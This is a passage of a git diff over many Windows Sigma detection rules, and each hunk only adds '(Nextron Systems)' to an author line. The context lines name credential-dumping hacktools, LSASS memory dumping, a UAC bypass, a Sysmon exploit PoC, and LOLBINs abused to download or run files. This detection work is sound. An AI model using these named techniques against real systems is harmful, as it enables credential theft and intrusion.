a/rules/windows/process_creation/proc_creation_win_hack_safetykatz.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_safetykatz.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name references: - https://github.com/GhostPack/SafetyKatz -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/20 tags: - attack.credential_access diff --git a/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml b/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml index 0ef80cfae..e66c218a3 100644 --- a/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml @@ -5,7 +5,7 @@ description: Detects the execution of SecurityXploded Tools references: - https://securityxploded.com/ - https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/12/19 modified: 2021/05/11 tags: diff --git a/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml index cfc6865e2..aa15c014f 100644 --- a/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml @@ -5,7 +5,7 @@ description: Detects the execution of the hacktool SharPersist - used to deploy references: - https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit - https://github.com/mandiant/SharPersist -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/09/15 tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_hack_sharpldapwhoami.yml b/rules/windows/process_creation/proc_creation_win_hack_sharpldapwhoami.yml index 5281027ac..b19940e26 100644 --- a/rules/windows/process_creation/proc_creation_win_hack_sharpldapwhoami.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_sharpldapwhoami.yml @@ -4,7 +4,7 @@ status: experimental description: Detects SharpLdapWhoami, a whoami alternative by asking the LDAP service on a domain controller references: - https://github.com/bugch3ck/SharpLdapWhoami -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/08/29 tags: - attack.discovery diff --git a/rules/windows/process_creation/proc_creation_win_hack_sysmoneop.yml b/rules/windows/process_creation/proc_creation_win_hack_sysmoneop.yml index 6b400e6a5..99893be35 100644 --- a/rules/windows/process_creation/proc_creation_win_hack_sysmoneop.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_sysmoneop.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120 references: - https://github.com/Wh04m1001/SysmonEoP -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/12/04 tags: - cve.2022.41120 diff --git a/rules/windows/process_creation/proc_creation_win_hack_wce.yml b/rules/windows/process_creation/proc_creation_win_hack_wce.yml index df6806703..53356e898 100644 --- a/rules/windows/process_creation/proc_creation_win_hack_wce.yml +++ b/rules/windows/process_creation/proc_creation_win_hack_wce.yml @@ -4,7 +4,7 @@ status: test description: Detects the use of Windows Credential Editor (WCE) references: - https://www.ampliasecurity.com/research/windows-credentials-editor/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/12/31 modified: 2022/03/04 tags: diff --git a/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml b/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml index 2f9418e0f..91f9a3242 100644 --- a/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml +++ b/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the use of Windows hacktools based on their import hash (imphash) even if the files have been renamed references: - Internal Research -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/04 modified: 2022/09/07 logsource: diff --git a/rules/windows/process_creation/proc_creation_win_handlekatz.yml b/rules/windows/process_creation/proc_creation_win_handlekatz.yml index f7469840c..80ddeea3f 100644 --- a/rules/windows/process_creation/proc_creation_win_handlekatz.yml +++ b/rules/windows/process_creation/proc_creation_win_handlekatz.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same references: - https://github.com/codewhitesec/HandleKatz -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/08/18 modified: 2022/10/05 tags: diff --git a/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml b/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml index 5e08c41ab..ad68c5ae8 100644 --- a/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml +++ b/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml @@ -5,7 +5,7 @@ description: Detects usage of hh.exe to execute/download remotely hosted .chm fi references: - https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html - https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/29 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml b/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml index 890f00356..7564f3632 100644 --- a/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml +++ b/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml @@ -4,7 +4,7 @@ status: test description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine references: - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/12/22 modified: 2023/01/30 tags: diff --git a/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml b/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml index 8d155ceb9..68fbf4965 100644 --- a/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml +++ b/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of UACMe (a tool used for UAC bypass) via default PE metadata references: - https://github.com/hfiref0x/UACME -author: Christian Burkard, Florian Roth +author: Christian Burkard (Nextron Systems), Florian Roth date: 2021/08/30 modified: 2022/11/19 tags: diff --git a/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml b/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml index ceb138e15..6f0cf758d 100644 --- a/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml +++ b/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml @@ -8,7 +8,7 @@ references: - https://twitter.com/cyberwar_15/status/1187287262054076416 - https://blog.alyac.co.kr/1901 - https://en.wikipedia.org/wiki/Hangul_(word_processor) -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/10/24 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml b/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml index 600d014e2..4ecc364dd 100644 --- a/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml +++ b/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml @@ -5,7 +5,7 @@ description: Detects suspicious IIS native-code module installations via command references: - https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/ - https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/12/11 modified: 2023/01/22 tags: diff --git a/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml b/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml index dd61d5638..b1c60e9fc 100644 --- a/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml +++ b/rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml @@ -5,7 +5,7 @@ description: Detects usage of "appcmd" to create new global URL rewrite rules. T references: - https://twitter.com/malmoeb/status/1616702107242971144 - https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/22 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_imaging_devices_unusual_parents.yml b/rules/windows/process_creation/proc_creation_win_imaging_devices_unusual_parents.yml index 74d077010..d99330805 100644 --- a/rules/windows/process_creation/proc_creation_win_imaging_devices_unusual_parents.yml +++ b/rules/windows/process_creation/proc_creation_win_imaging_devices_unusual_parents.yml @@ -4,7 +4,7 @@ status: experimental description: Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity references: - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/27 modified: 2022/12/29 tags: diff --git a/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml b/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml index f429f0eb8..9f76c3c05 100644 --- a/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml +++ b/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml @@ -4,7 +4,7 @@ status: test description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives) references: - https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/07/24 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml b/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml index 38c0bba81..dd3d5918a 100644 --- a/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml +++ b/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml @@ -5,7 +5,7 @@ description: Adversaries may install a root certificate on a compromised system references: - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ - https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/09 modified: 2023/01/16 tags: diff --git a/rules/windows/process_creation/proc_creation_win_import_module_susp_dirs.yml b/rules/windows/process_creation/proc_creation_win_import_module_susp_dirs.yml index 070937e04..b7d5035eb 100644 --- a/rules/windows/process_creation/proc_creation_win_import_module_susp_dirs.yml +++ b/rules/windows/process_creation/proc_creation_win_import_module_susp_dirs.yml @@ -7,7 +7,7 @@ status: experimental description: Detects powershell scripts that import modules from suspicious directories references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/10 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml b/rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml index 67599593f..f480e27f7 100644 --- a/rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml +++ b/rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml @@ -4,7 +4,7 @@ status: experimental description: Detects encoded base64 MZ header in the commandline references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/12 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml index 97bbbe675..5a4e980a1 100644 --- a/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml +++ b/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml @@ -7,7 +7,7 @@ status: experimental description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec references: - https://twitter.com/m417z/status/1566674631788007425 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/06 modified: 2023/01/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml b/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml index 5600e4a61..95d4083ac 100644 --- a/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml +++ b/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml @@ -5,7 +5,7 @@ description: Detects the registration of a debugger for a program that is availa references: - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/ - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ -author: Florian Roth, oscd.community, Jonhnathan Ribeiro +author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro date: 2019/09/06 modified: 2022/08/06 tags: diff --git a/rules/windows/process_creation/proc_creation_win_iox.yml b/rules/windows/process_creation/proc_creation_win_iox.yml index 8123bb841..d536f67ca 100644 --- a/rules/windows/process_creation/proc_creation_win_iox.yml +++ b/rules/windows/process_creation/proc_creation_win_iox.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the use of IOX - a tool for port forwarding and intranet proxy purposes references: - https://github.com/EddieIvan01/iox -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/10/08 tags: - attack.command_and_control diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml b/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml index c1b604018..f801194c0 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml @@ -6,7 +6,7 @@ references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/ - https://twitter.com/nas_bench/status/1534916659676422152 - https://twitter.com/nas_bench/status/1534915321856917506 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/09 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml b/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml index e75be25e3..dba1ce0a0 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml @@ -5,7 +5,7 @@ related: type: similar status: experimental description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th postiional argument -author: Nasreddine Bencherchali, memory-shards +author: Nasreddine Bencherchali (Nextron Systems), memory-shards references: - https://twitter.com/lefterispan/status/1286259016436514816 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/ diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml b/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml index ecf092fb9..f6e3ec2e0 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml @@ -5,7 +5,7 @@ related: type: similar status: experimental description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th postiional argument -author: Nasreddine Bencherchali, memory-shards +author: Nasreddine Bencherchali (Nextron Systems), memory-shards references: - https://twitter.com/lefterispan/status/1286259016436514816 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/ diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml b/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml index 989edb461..8b1f26667 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml @@ -4,7 +4,7 @@ status: experimental description: Detects when a user downloads file by using CertOC.exe references: - https://lolbas-project.github.io/lolbas/Binaries/Certoc/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/05/16 tags: - attack.command_and_control diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml b/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml index ea7071e42..7a44c92ca 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the execution of CustomShellHost binary where the child isn't located in 'C:\Windows\explorer.exe' references: - https://github.com/LOLBAS-Project/LOLBAS/pull/180 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/19 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml b/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml index f88d541c3..f0b77c4b1 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the execution of DeviceCredentialDeployment to hide a process from view references: - https://github.com/LOLBAS-Project/LOLBAS/pull/147 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/19 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml b/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml index c5fc08317..d034c69f9 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml @@ -5,7 +5,7 @@ description: Detects the execution of Xwizard tool from the non-default director references: - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ - http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/09/20 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml b/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml index 884abf69a..cfd524397 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml @@ -5,7 +5,7 @@ description: Detects usage of winget to install applications via manifest file. references: - https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install - https://lolbas-project.github.io/lolbas/Binaries/Winget/ -author: Sreeman, Florian Roth, Frack113 +author: Sreeman, Florian Roth (Nextron Systems), Frack113 date: 2020/04/21 modified: 2023/01/03 tags: diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml b/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml index ff672f2cb..cbf0a6958 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml @@ -10,7 +10,7 @@ description: Execute commands and binaries from the context of "forfiles". This references: - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/ - https://pentestlab.blog/2020/07/06/indirect-command-execution/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/14 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml b/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml index ee2bf03be..4a61856b4 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of the IEExec utility to download payloads references: - https://lolbas-project.github.io/lolbas/Binaries/Ieexec/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/05/16 logsource: category: process_creation diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml b/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml index 7b5727d43..9d6242e3b 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\ references: - https://github.com/LOLBAS-Project/LOLBAS/pull/239 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/19 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml b/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml index e522c5edd..9766a3642 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries. references: - https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/11/01 logsource: product: windows diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml b/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml index b5772c0a8..8e0d85e55 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands. references: - https://twitter.com/nas_bench/status/1535981653239255040 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/19 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml b/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml index 2a869aa77..5cb82525a 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml @@ -4,7 +4,7 @@ status: experimental description: The "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) can be used to execute arbitrary binaries references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/09 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml b/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml index 60576f664..d38d10777 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab) references: - https://lolbas-project.github.io/lolbas/Binaries/Msdt/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/13 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml b/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml index f26e7afc4..76e3bc775 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of "MSOHTMED" to download arbitrary files references: - https://github.com/LOLBAS-Project/LOLBAS/pull/238/files -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/19 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml b/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml index 1b7582afb..480d841e0 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files references: - https://github.com/LOLBAS-Project/LOLBAS/pull/238/files -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/19 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml b/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml index c4e5d085c..9926bf08c 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting references: - https://twitter.com/nas_bench/status/1537563834478645252 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/16 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml b/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml index 2a068f1fb..c4cee55c9 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml @@ -8,7 +8,7 @@ description: Detects execition of commands and binaries from the context of The references: - https://lolbas-project.github.io/lolbas/Binaries/Pcalua/ - https://pentestlab.blog/2020/07/06/indirect-command-execution/ -author: Nasreddine Bencherchali, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +author: Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community date: 2022/06/14 modified: 2023/01/04 tags: diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml b/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml index 034d07b20..fd21e5f61 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml @@ -4,7 +4,7 @@ status: experimental description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability references: - https://twitter.com/nas_bench/status/1535663791362519040 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/13 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml b/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml index 9cb9a4e7a..f33757f8b 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files. It can be abused to run malicious ".xbap" files any bypass AWL references: - https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/01 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml b/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml index 5612d3c05..bde34730f 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files references: - https://github.com/LOLBAS-Project/LOLBAS/pull/239/files -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/19 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml b/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml index f2ebfb000..d797d2b56 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml @@ -6,7 +6,7 @@ references: - https://www.fortiguard.com/threat-signal-report/4718?s=09 - https://lolbas-project.github.io/lolbas/Binaries/Regasm/ - https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/25 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml b/rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml index b1c2b8b64..868019cd7 100644 --- a/rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml +++ b/rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application. references: - 